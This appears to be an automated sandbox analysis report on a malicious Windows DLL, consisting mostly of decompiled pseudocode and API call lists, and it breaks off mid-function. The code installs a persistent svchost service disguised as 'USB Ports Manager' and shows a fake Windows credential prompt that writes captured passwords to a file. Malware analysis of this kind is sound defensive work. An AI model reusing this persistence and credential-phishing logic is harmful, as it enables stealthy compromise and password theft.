                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$AllocLocallstrlen$CharCloseComputeCrc32CreateEventHandleLowerMessageObjectPostSingleSleepThreadWait
                                                                                                                        • String ID: "%s%s" /c %s$%lu$%s%c%lu%s$%s%s$%s%s%s$.cab$.pdll$/c %s$cmd.exe$gd$open
                                                                                                                        • API String ID: 2480811851-2674861874
                                                                                                                        • Opcode ID: 871004302043b80dabc75070c8d11b4cbf388b11f041d90172e49755a63ece1d
                                                                                                                        • Instruction ID: 77f9461c5fc2ebf34d36e2996fa021b08ba751c64d09693b0043dfe7a116ba72
                                                                                                                        • Opcode Fuzzy Hash: 871004302043b80dabc75070c8d11b4cbf388b11f041d90172e49755a63ece1d
                                                                                                                        • Instruction Fuzzy Hash: 43325AB3E483E5BFEB20DB288C45F6B766DEF46B14F004509F955AA1C1D7B1E81087A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F333C60() {
                                                                                                                        				char _v760;
                                                                                                                        				char _v772;
                                                                                                                        				char _v780;
                                                                                                                        				char _v1016;
                                                                                                                        				char _v1024;
                                                                                                                        				char _v1032;
                                                                                                                        				char _v1036;
                                                                                                                        				char _v1040;
                                                                                                                        				char _v1044;
                                                                                                                        				char _v1048;
                                                                                                                        				intOrPtr _v1052;
                                                                                                                        				int _v1056;
                                                                                                                        				intOrPtr _v1060;
                                                                                                                        				int _v1064;
                                                                                                                        				intOrPtr _v1068;
                                                                                                                        				int _v1072;
                                                                                                                        				int* _v1076;
                                                                                                                        				char _v1080;
                                                                                                                        				char* _v1084;
                                                                                                                        				char* _v1088;
                                                                                                                        				void* _v1092;
                                                                                                                        				void* _v1096;
                                                                                                                        				char _v1100;
                                                                                                                        				void* _v1104;
                                                                                                                        				void* _v1108;
                                                                                                                        				void* _v1112;
                                                                                                                        				int _v1116;
                                                                                                                        				void* _v1120;
                                                                                                                        				char* _v1124;
                                                                                                                        				void* _v1128;
                                                                                                                        				intOrPtr _v1132;
                                                                                                                        				char _v1140;
                                                                                                                        				void* _t80;
                                                                                                                        				void** _t85;
                                                                                                                        				char* _t99;
                                                                                                                        				int _t100;
                                                                                                                        				intOrPtr _t104;
                                                                                                                        				intOrPtr _t108;
                                                                                                                        				char* _t125;
                                                                                                                        				void* _t145;
                                                                                                                        				long _t151;
                                                                                                                        				char* _t173;
                                                                                                                        				CHAR* _t174;
                                                                                                                        				long _t182;
                                                                                                                        				char** _t196;
                                                                                                                        				char** _t199;
                                                                                                                        				char** _t200;
                                                                                                                        				char** _t201;
                                                                                                                        				char** _t202;
                                                                                                                        				char** _t203;
                                                                                                                        				intOrPtr _t207;
                                                                                                                        				intOrPtr _t220;
                                                                                                                        
                                                                                                                        				_t196 =  &_v1124;
                                                                                                                        				_v1112 = 0;
                                                                                                                        				_t80 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                                                        				_v1108 = _t80;
                                                                                                                        				if(_t80 != 0) {
                                                                                                                        					L2:
                                                                                                                        					_v1124 = 0;
                                                                                                                        					_t145 = OpenServiceA(_t80, "USBManager", 0xf01ff);
                                                                                                                        					if(_t145 != 0) {
                                                                                                                        						L14:
                                                                                                                        						_v1112 = 1;
                                                                                                                        						wsprintfA( &_v1044, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
                                                                                                                        						if(RegCreateKeyExA(0x80000002,  &_v1036, 0, 0, 0, 0xf023f, 0,  &_v1116, 0) == 0) {
                                                                                                                        							_push(0x105);
                                                                                                                        							_push( &_v1036);
                                                                                                                        							L6F33C2EE();
                                                                                                                        							_v1120 = 0x105;
                                                                                                                        							_v1116 = 2;
                                                                                                                        							if(RegQueryValueExA(_v1124, "ServiceDLL", 0,  &_v1116,  &_v1044,  &_v1120) != 0) {
                                                                                                                        								L17:
                                                                                                                        								_t151 = M6F34052C; // 0x33
                                                                                                                        								_t173 = M6F340524; // 0x9954b0
                                                                                                                        								RegSetValueExA(_v1124, "ServiceDLL", 0, 2, _t173, _t151 + 1);
                                                                                                                        							} else {
                                                                                                                        								_t174 = M6F340524; // 0x9954b0
                                                                                                                        								if(lstrcmpiA( &_v1044, _t174) != 0) {
                                                                                                                        									goto L17;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							RegCloseKey(_v1124);
                                                                                                                        						}
                                                                                                                        						L6F33C2EE();
                                                                                                                        						_t85 =  &_v1104;
                                                                                                                        						_v1104 = 0;
                                                                                                                        						__imp__QueryServiceStatusEx(_t145, 0,  &_v1080, 0x24, _t85,  &_v1072, 0x24);
                                                                                                                        						if(_t85 == 0 || _v1096 != 4) {
                                                                                                                        							_t220 = M6F340544; // 0x1
                                                                                                                        							if(_t220 == 0) {
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        							} else {
                                                                                                                        								_push(1);
                                                                                                                        								_v1140 = "s";
                                                                                                                        								_push( &_v1140);
                                                                                                                        							}
                                                                                                                        							_push(_t145);
                                                                                                                        							E6F3337D0();
                                                                                                                        						}
                                                                                                                        						CloseServiceHandle(_t145);
                                                                                                                        					} else {
                                                                                                                        						_t207 = M6F340544; // 0x1
                                                                                                                        						if(_t207 != 0) {
                                                                                                                        							_t99 = M6F34053C; // 0x9973a5
                                                                                                                        							_t100 = wsprintfA( &_v780, "%%SYSTEMROOT%%\\system32\\%s.exe -k \"%s\" -svcr \"%s\"", "svchost", "USBPortsManagerGrp", _t99);
                                                                                                                        							_t199 =  &(_t196[5]);
                                                                                                                        							_v1112 = _t100;
                                                                                                                        							_t145 = CreateServiceA(_v1100, "USBManager", "USB Ports Manager", 0xf01ff, 0x20, 2, 0,  &_v772, 0, 0, 0, 0, 0);
                                                                                                                        							if(_t145 != 0) {
                                                                                                                        								_v1072 = 1;
                                                                                                                        								_v1064 = 1;
                                                                                                                        								_v1056 = 1;
                                                                                                                        								_v1068 = 0x1388;
                                                                                                                        								_v1060 = 0x1388;
                                                                                                                        								_v1052 = 0x1388;
                                                                                                                        								_v1092 = 0;
                                                                                                                        								_v1084 = 0;
                                                                                                                        								_v1088 = 0;
                                                                                                                        								_v1080 = 3;
                                                                                                                        								_v1076 =  &_v1072;
                                                                                                                        								__imp__ChangeServiceConfig2A(_t145, 2,  &_v1092);
                                                                                                                        								_t104 =  *0x6f34047c; // 0x998bd0
                                                                                                                        								wsprintfA( &_v1048, "%s\\%s%c%s", _t104, "svchost", 0, 0x6f33d543);
                                                                                                                        								_t200 =  &(_t199[6]);
                                                                                                                        								if(RegCreateKeyExA(0x80000002,  &_v1040, 0, 0, 0, 0xf023f, 0,  &_v1120, 0) == 0) {
                                                                                                                        									RegSetValueExA(_v1120, "USBPortsManagerGrp", 0, 7, "USBManager", lstrlenA("USBManager"));
                                                                                                                        									RegCloseKey(_v1120);
                                                                                                                        								}
                                                                                                                        								_t108 =  *0x6f34047c; // 0x998bd0
                                                                                                                        								wsprintfA( &_v1040, "%s\\%s%c%s", _t108, "svchost", 0x5c, "USBPortsManagerGrp");
                                                                                                                        								_t201 =  &(_t200[6]);
                                                                                                                        								if(RegCreateKeyExA(0x80000002,  &_v1032, 0, 0, 0, 0xf023f, 0,  &_v1112, 0) == 0) {
                                                                                                                        									E6F332170(_v1112, 4);
                                                                                                                        									_t201 =  &(_t201[2]);
                                                                                                                        									_v1100 = 0x2000;
                                                                                                                        									RegSetValueExA(_v1112, "AuthenticationCapabilities", 0, 4,  &_v1100, 4);
                                                                                                                        									_v1104 = 1;
                                                                                                                        									RegSetValueExA(_v1112, "CoInitializeSecurityParam", 0, 4,  &_v1104, 4);
                                                                                                                        									RegCloseKey(_v1112);
                                                                                                                        								}
                                                                                                                        								wsprintfA( &_v1032, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
                                                                                                                        								_t202 =  &(_t201[5]);
                                                                                                                        								if(RegCreateKeyExA(0x80000002,  &_v1024, 0, 0, 0, 0xf023f, 0,  &_v1104, 0) == 0) {
                                                                                                                        									E6F332170(_v1104, 4);
                                                                                                                        									_t182 = M6F34052C; // 0x33
                                                                                                                        									_t125 = M6F340524; // 0x9954b0
                                                                                                                        									_t202 =  &(_t202[2]);
                                                                                                                        									RegSetValueExA(_v1104, "ServiceDLL", 0, 2, _t125, _t182 + 1);
                                                                                                                        									RegSetValueExA(_v1104, "ImagePath", 0, 2,  &_v760, _v1100 + 1);
                                                                                                                        									RegSetValueExA(_v1104, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry"));
                                                                                                                        									_v1096 = 0;
                                                                                                                        									RegSetValueExA(_v1104, "ServiceDllUnloadOnStop", 0, 4,  &_v1096, 4);
                                                                                                                        									RegCloseKey(_v1104);
                                                                                                                        								}
                                                                                                                        								wsprintfA( &_v1024, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6f33d543);
                                                                                                                        								_t203 =  &(_t202[5]);
                                                                                                                        								if(RegCreateKeyExA(0x80000002,  &_v1016, 0, 0, 0, 0xf023f, 0,  &_v1096, 0) == 0) {
                                                                                                                        									E6F332170(_v1096, 4);
                                                                                                                        									_t203 =  &(_t203[2]);
                                                                                                                        									RegSetValueExA(_v1096, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry"));
                                                                                                                        									RegCloseKey(_v1096);
                                                                                                                        								}
                                                                                                                        								E6F332170(_t145, 2);
                                                                                                                        								_t196 =  &(_t203[2]);
                                                                                                                        								goto L14;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					CloseServiceHandle(_v1128);
                                                                                                                        					return _v1132;
                                                                                                                        				} else {
                                                                                                                        					_t80 = OpenSCManagerA(0, 0, 1);
                                                                                                                        					_v1108 = _t80;
                                                                                                                        					if(_t80 == 0) {
                                                                                                                        						return 0;
                                                                                                                        					} else {
                                                                                                                        						goto L2;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        0x6f333de2
                                                                                                                        0x6f333de8
                                                                                                                        0x6f333e04
                                                                                                                        0x6f333e06
                                                                                                                        0x6f333e2a
                                                                                                                        0x6f333e33
                                                                                                                        0x6f333e3c
                                                                                                                        0x6f333e4f
                                                                                                                        0x6f333e57
                                                                                                                        0x6f333e6d
                                                                                                                        0x6f333e75
                                                                                                                        0x6f333e7c
                                                                                                                        0x6f333e7c
                                                                                                                        0x6f333e9b
                                                                                                                        0x6f333e9d
                                                                                                                        0x6f333ec1
                                                                                                                        0x6f333ece
                                                                                                                        0x6f333ed3
                                                                                                                        0x6f333ed9
                                                                                                                        0x6f333ee2
                                                                                                                        0x6f333ef1
                                                                                                                        0x6f333f0e
                                                                                                                        0x6f333f2e
                                                                                                                        0x6f333f44
                                                                                                                        0x6f333f48
                                                                                                                        0x6f333f4f
                                                                                                                        0x6f333f4f
                                                                                                                        0x6f333f6e
                                                                                                                        0x6f333f70
                                                                                                                        0x6f333f94
                                                                                                                        0x6f333f9d
                                                                                                                        0x6f333fa2
                                                                                                                        0x6f333fc3
                                                                                                                        0x6f333fca
                                                                                                                        0x6f333fca
                                                                                                                        0x6f333fd3
                                                                                                                        0x6f333fd8
                                                                                                                        0x00000000
                                                                                                                        0x6f333fd8
                                                                                                                        0x6f333d28
                                                                                                                        0x6f333ccc
                                                                                                                        0x6f334109
                                                                                                                        0x6f33411d
                                                                                                                        0x6f333c88
                                                                                                                        0x6f333c8c
                                                                                                                        0x6f333c8e
                                                                                                                        0x6f333c94
                                                                                                                        0x6f334129
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333c94

                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333C7E
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333C8C
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6F333CAA
                                                                                                                        • wsprintfA.USER32 ref: 6F333CEF
                                                                                                                        • CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6F333D1E
                                                                                                                        • ChangeServiceConfig2A.ADVAPI32 ref: 6F333D74
                                                                                                                        • wsprintfA.USER32 ref: 6F333D95
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,?,?,?,00000000,00000002,?), ref: 6F333DB3
                                                                                                                        • lstrlenA.KERNEL32(USBManager,?,?,?,00000000,00000002,?), ref: 6F333DC2
                                                                                                                        • RegSetValueExA.ADVAPI32(?,USBPortsManagerGrp,00000000,00000007,USBManager,00000000,?,?,?,00000000,00000002,?), ref: 6F333DDB
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000002,?), ref: 6F333DE2
                                                                                                                        • wsprintfA.USER32 ref: 6F333E04
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333E22
                                                                                                                        • RegSetValueExA.ADVAPI32 ref: 6F333E57
                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,CoInitializeSecurityParam,00000000,00000004,?,00000004), ref: 6F333E75
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 6F333E7C
                                                                                                                        • wsprintfA.USER32 ref: 6F333E9B
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333EB9
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,009954B0,00000034), ref: 6F333EF1
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ImagePath,00000000,00000002,?,?), ref: 6F333F0E
                                                                                                                        • lstrlenA.KERNEL32(SvcEntry), ref: 6F333F15
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6F333F2E
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceDllUnloadOnStop,00000000,00000004,?,00000004), ref: 6F333F48
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F333F4F
                                                                                                                        • wsprintfA.USER32 ref: 6F333F6E
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333F8C
                                                                                                                        • lstrlenA.KERNEL32(SvcEntry), ref: 6F333FAA
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6F333FC3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F333FCA
                                                                                                                        • wsprintfA.USER32 ref: 6F333FFC
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,\Parameters), ref: 6F33401A
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000105), ref: 6F334032
                                                                                                                        • RegQueryValueExA.ADVAPI32 ref: 6F334061
                                                                                                                        • lstrcmpiA.KERNEL32(?,009954B0), ref: 6F334077
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,009954B0,00000034), ref: 6F33409D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3340A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000024), ref: 6F3340B1
                                                                                                                        • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,00000024), ref: 6F3340C8
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3340FE
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 6F334109
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$Close$CreateServicewsprintf$Openlstrlen$HandleManagerMemoryQueryZero$ChangeConfig2Statuslstrcmpi
                                                                                                                        • String ID: %%SYSTEMROOT%%\system32\%s.exe -k "%s" -svcr "%s"$%s\%s%c%s$AuthenticationCapabilities$CoInitializeSecurityParam$ImagePath$SYSTEM\CurrentControlSet%s%s%s$ServiceDLL$ServiceDllUnloadOnStop$ServiceMain$SvcEntry$USB Ports Manager$USBManager$USBPortsManagerGrp$\Parameters$\Services\$svchost
                                                                                                                        • API String ID: 567274075-2313540708
                                                                                                                        • Opcode ID: 6c46b81ff668685163f17a5dd8cb97c76a573c8b989e1ee7d0da47bd9e696097
                                                                                                                        • Instruction ID: e75517b751e58ab8b4c927880bb4f16b22d5a4c9f60e3aac4c359e693cc06952
                                                                                                                        • Opcode Fuzzy Hash: 6c46b81ff668685163f17a5dd8cb97c76a573c8b989e1ee7d0da47bd9e696097
                                                                                                                        • Instruction Fuzzy Hash: 8FD17CB2A04798BFD310DF61CC85E6BB7EDFB99B08F40490DF69992140D772E4188B66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 47%
                                                                                                                        			E6F3396D0(intOrPtr _a4) {
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				signed int _v72;
                                                                                                                        				char _v1028;
                                                                                                                        				short _v1036;
                                                                                                                        				char _v1048;
                                                                                                                        				void* _v1296;
                                                                                                                        				char _v1300;
                                                                                                                        				void* _v1304;
                                                                                                                        				intOrPtr _v1308;
                                                                                                                        				void* _v1312;
                                                                                                                        				void* _v1316;
                                                                                                                        				void* _v1320;
                                                                                                                        				intOrPtr _v1324;
                                                                                                                        				void* _v1328;
                                                                                                                        				void* _v1332;
                                                                                                                        				void* _v1336;
                                                                                                                        				intOrPtr _v1340;
                                                                                                                        				void* _v1344;
                                                                                                                        				void* _v1348;
                                                                                                                        				void* _v1352;
                                                                                                                        				char _v1356;
                                                                                                                        				WCHAR* _v1368;
                                                                                                                        				short* _v1372;
                                                                                                                        				char _v1376;
                                                                                                                        				void* _v1380;
                                                                                                                        				intOrPtr _v1384;
                                                                                                                        				void* _v1392;
                                                                                                                        				intOrPtr _v1396;
                                                                                                                        				struct HINSTANCE__* _v1400;
                                                                                                                        				void* _v1404;
                                                                                                                        				char _v1412;
                                                                                                                        				char _v1416;
                                                                                                                        				void* _v1420;
                                                                                                                        				long _v1424;
                                                                                                                        				long _v1432;
                                                                                                                        				long _v1436;
                                                                                                                        				long _v1448;
                                                                                                                        				intOrPtr _v1452;
                                                                                                                        				long _v1456;
                                                                                                                        				intOrPtr _v1472;
                                                                                                                        				char _v1480;
                                                                                                                        				char _v1496;
                                                                                                                        				intOrPtr _v1500;
                                                                                                                        				intOrPtr _v1508;
                                                                                                                        				intOrPtr _v1524;
                                                                                                                        				void* _v1532;
                                                                                                                        				intOrPtr _v1544;
                                                                                                                        				void* _v1556;
                                                                                                                        				void* _t93;
                                                                                                                        				void* _t94;
                                                                                                                        				void* _t99;
                                                                                                                        				CHAR* _t106;
                                                                                                                        				void* _t110;
                                                                                                                        				void* _t133;
                                                                                                                        				int _t140;
                                                                                                                        				signed int _t145;
                                                                                                                        				struct HDESK__* _t149;
                                                                                                                        				void* _t152;
                                                                                                                        				struct HINSTANCE__* _t154;
                                                                                                                        				void* _t155;
                                                                                                                        				WCHAR* _t156;
                                                                                                                        				WCHAR* _t157;
                                                                                                                        				struct HDESK__* _t158;
                                                                                                                        				struct HDESK__* _t171;
                                                                                                                        				WCHAR* _t174;
                                                                                                                        				WCHAR* _t180;
                                                                                                                        				struct HDESK__* _t183;
                                                                                                                        				WCHAR* _t185;
                                                                                                                        				struct HINSTANCE__* _t188;
                                                                                                                        				short* _t190;
                                                                                                                        				void* _t191;
                                                                                                                        				signed int _t195;
                                                                                                                        				signed int _t196;
                                                                                                                        				WCHAR* _t199;
                                                                                                                        				long _t200;
                                                                                                                        				short* _t202;
                                                                                                                        				void* _t204;
                                                                                                                        				void* _t205;
                                                                                                                        				void* _t206;
                                                                                                                        
                                                                                                                        				_t93 = M6F340504; // 0x99ec68
                                                                                                                        				_t157 = M6F3404F8; // 0x99b7a8
                                                                                                                        				_t94 = E6F335130(_t157, _t93, 0x6f33d664);
                                                                                                                        				_t204 =  &_v1416 + 0xc;
                                                                                                                        				if(_t94 != 0) {
                                                                                                                        					L39:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t152 = 0;
                                                                                                                        					if(_a4 != 0) {
                                                                                                                        						_t183 =  *0x6f340480; // 0x0
                                                                                                                        						SwitchDesktop(_t183);
                                                                                                                        						_t149 =  *0x6f340480; // 0x0
                                                                                                                        						SetThreadDesktop(_t149);
                                                                                                                        					}
                                                                                                                        					_t188 = LoadLibraryA("credui.dll");
                                                                                                                        					_v1380 = _t188;
                                                                                                                        					if(_t188 == _t152) {
                                                                                                                        						L37:
                                                                                                                        						if(_a4 != _t152) {
                                                                                                                        							Sleep(0x7d0);
                                                                                                                        							_t158 =  *0x6f340484; // 0x0
                                                                                                                        							SwitchDesktop(_t158);
                                                                                                                        							_t171 =  *0x6f340484; // 0x0
                                                                                                                        							SetThreadDesktop(_t171);
                                                                                                                        						}
                                                                                                                        						goto L39;
                                                                                                                        					}
                                                                                                                        					_push(0xff000000);
                                                                                                                        					_push(4);
                                                                                                                        					_push( &_v1356);
                                                                                                                        					_push(_t188);
                                                                                                                        					_v1356 = 0x24bec39d;
                                                                                                                        					_v1352 = _t152;
                                                                                                                        					_v1348 = _t152;
                                                                                                                        					_v1344 = _t152;
                                                                                                                        					_v1340 = 0xb4bb2c26;
                                                                                                                        					_v1336 = _t152;
                                                                                                                        					_v1332 = _t152;
                                                                                                                        					_v1328 = _t152;
                                                                                                                        					_v1324 = 0x4b177521;
                                                                                                                        					_v1320 = _t152;
                                                                                                                        					_v1316 = _t152;
                                                                                                                        					_v1312 = _t152;
                                                                                                                        					_v1308 = 0xc07eb83e;
                                                                                                                        					_v1304 = _t152;
                                                                                                                        					_v1300 = _t152;
                                                                                                                        					_v1296 = _t152;
                                                                                                                        					_t99 = E6F331DB0();
                                                                                                                        					_t205 = _t204 + 0x10;
                                                                                                                        					if(_t99 == 0) {
                                                                                                                        						L36:
                                                                                                                        						FreeLibrary(_t188);
                                                                                                                        						goto L37;
                                                                                                                        					}
                                                                                                                        					_t185 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
                                                                                                                        					if(_t185 == _t152) {
                                                                                                                        						L35:
                                                                                                                        						goto L36;
                                                                                                                        					}
                                                                                                                        					_push(0x14);
                                                                                                                        					_push( &_v1376);
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_v1384 = 0x14;
                                                                                                                        					_v1380 = _t152;
                                                                                                                        					_v1412 = 0x202;
                                                                                                                        					_v1396 = 0x101;
                                                                                                                        					_t26 =  &(_t185[0x657]); // 0xcae
                                                                                                                        					_t190 = _t26;
                                                                                                                        					_t27 =  &(_t185[0x6d8]); // 0xdb0
                                                                                                                        					_t199 = _t27;
                                                                                                                        					GetSystemDirectoryA( &_v1300, 0x104);
                                                                                                                        					PathAddBackslashA( &_v1300);
                                                                                                                        					_t106 = "rstrui.exe";
                                                                                                                        					if(_v4 != _t152) {
                                                                                                                        						_t106 = "wuaueng.dll";
                                                                                                                        					}
                                                                                                                        					lstrcatA( &_v1300, _t106);
                                                                                                                        					_t154 = LoadLibraryExA( &_v1300, _t152, 0x20);
                                                                                                                        					if(_t154 == 0) {
                                                                                                                        						L20:
                                                                                                                        						_t174 = M6F3404F8; // 0x99b7a8
                                                                                                                        						_t110 = M6F340504; // 0x99ec68
                                                                                                                        						_t200 = 0;
                                                                                                                        						_t191 = 0;
                                                                                                                        						_v1392 = 0;
                                                                                                                        						_v1424 = 0;
                                                                                                                        						_v1416 = 0;
                                                                                                                        						_v1404 = 0;
                                                                                                                        						_v1420 = 0;
                                                                                                                        						wsprintfW( &_v1036, L"%s\\%s", _t110, _t174);
                                                                                                                        						_t206 = _t205 + 0x10;
                                                                                                                        						_push( &_v1412);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0x6f33d664);
                                                                                                                        						_push( &_v1028);
                                                                                                                        						_push(0);
                                                                                                                        						if(_v1296() != 0 || GetLastError() != 0x7a) {
                                                                                                                        							L34:
                                                                                                                        							HeapFree(GetProcessHeap(), _t200, _t185);
                                                                                                                        							_t188 = _v1400;
                                                                                                                        							_t152 = 0;
                                                                                                                        							goto L35;
                                                                                                                        						} else {
                                                                                                                        							_t155 = HeapAlloc(GetProcessHeap(), 8, _v1432);
                                                                                                                        							_v1420 = _t155;
                                                                                                                        							if(_t155 == 0) {
                                                                                                                        								goto L34;
                                                                                                                        							}
                                                                                                                        							_push( &_v1432);
                                                                                                                        							_push(_t155);
                                                                                                                        							_push(0x6f33d664);
                                                                                                                        							_push( &_v1048);
                                                                                                                        							_push(0);
                                                                                                                        							if(_v1316() == 0) {
                                                                                                                        								L33:
                                                                                                                        								HeapFree(GetProcessHeap(), _t200, _t155);
                                                                                                                        								goto L34;
                                                                                                                        							}
                                                                                                                        							while(1) {
                                                                                                                        								L25:
                                                                                                                        								_push(0x20);
                                                                                                                        								_push( &_v1436);
                                                                                                                        								_push( &_v1448);
                                                                                                                        								_push( &_v1456);
                                                                                                                        								_push(_v1452);
                                                                                                                        								_push(_t155);
                                                                                                                        								_push( &_v1424);
                                                                                                                        								_push(_t191);
                                                                                                                        								_push( &_v1416);
                                                                                                                        								_v1432 = 1;
                                                                                                                        								_v1424 = _t200;
                                                                                                                        								_v1456 = _t200;
                                                                                                                        								_v1448 = _t200;
                                                                                                                        								_v1436 = _t200;
                                                                                                                        								if(_v1384() != 0) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_push(0x404);
                                                                                                                        								_push(_t185);
                                                                                                                        								_v1480 = 0x202;
                                                                                                                        								L6F33C2EE();
                                                                                                                        								_push(0x202);
                                                                                                                        								_t74 =  &(_t185[0x202]); // 0x404
                                                                                                                        								_t156 = _t74;
                                                                                                                        								_push(_t156);
                                                                                                                        								_v1472 = 0x101;
                                                                                                                        								L6F33C2EE();
                                                                                                                        								_push( &_v1480);
                                                                                                                        								_push(_t156);
                                                                                                                        								_push(_t200);
                                                                                                                        								_push(_t200);
                                                                                                                        								_push( &_v1496);
                                                                                                                        								_push(_t185);
                                                                                                                        								_push(_v1500);
                                                                                                                        								_push(_v1508);
                                                                                                                        								_push(1);
                                                                                                                        								if(_v1420() != 0) {
                                                                                                                        									_push(0x404);
                                                                                                                        									_t81 =  &(_t185[0x303]); // 0x606
                                                                                                                        									_t202 = _t81;
                                                                                                                        									_push(_t202);
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_push(0x2a4);
                                                                                                                        									_t82 =  &(_t185[0x505]); // 0xa0a
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_push(0x152);
                                                                                                                        									_t83 =  &(_t185[0x505]); // 0xa0a
                                                                                                                        									_push(0x202);
                                                                                                                        									_push(_t202);
                                                                                                                        									_push(_t185);
                                                                                                                        									if(_v1456() == 0) {
                                                                                                                        										_t85 =  &(_t185[0x505]); // 0xa0a
                                                                                                                        										_t133 = E6F335130(_t202, _t85, _t156);
                                                                                                                        										_t206 = _t206 + 0xc;
                                                                                                                        										if(_t133 == 0) {
                                                                                                                        											_v1556 = 0;
                                                                                                                        											_t191 = 0x52e;
                                                                                                                        										} else {
                                                                                                                        											_t180 = M6F3404D0; // 0x98a4d0
                                                                                                                        											WritePrivateProfileStringW(L"PWD", _t185, _t156, _t180);
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									_t200 = 0;
                                                                                                                        								}
                                                                                                                        								__imp__CoTaskMemFree(_v1544);
                                                                                                                        								_t155 = _v1532;
                                                                                                                        								if(_v1524 == _t200) {
                                                                                                                        									continue;
                                                                                                                        								} else {
                                                                                                                        									goto L33;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							asm("sbb esi, esi");
                                                                                                                        							_t191 = ( ~_v72 & 0xfffff693) + 0xfdb;
                                                                                                                        							Sleep(0x1f4);
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						_push(0x80);
                                                                                                                        						_push(_t190);
                                                                                                                        						if(_v4 != 0) {
                                                                                                                        							if(LoadStringW(_t154, 0x69, ??, ??) > 0) {
                                                                                                                        								_v1372 = _t190;
                                                                                                                        							}
                                                                                                                        							_t195 = FormatMessageW(0xaff, _t154, 0xb0000028, 0, _t199, 0x926, 0);
                                                                                                                        							_t196 = _t195 + LoadStringW(_t154, 0x184,  &(_t199[_t195]), 0x926 - _t195);
                                                                                                                        							_t140 = wsprintfW( &(_t199[_t196]), L"\r\n\r\n");
                                                                                                                        							_t205 = _t205 + 8;
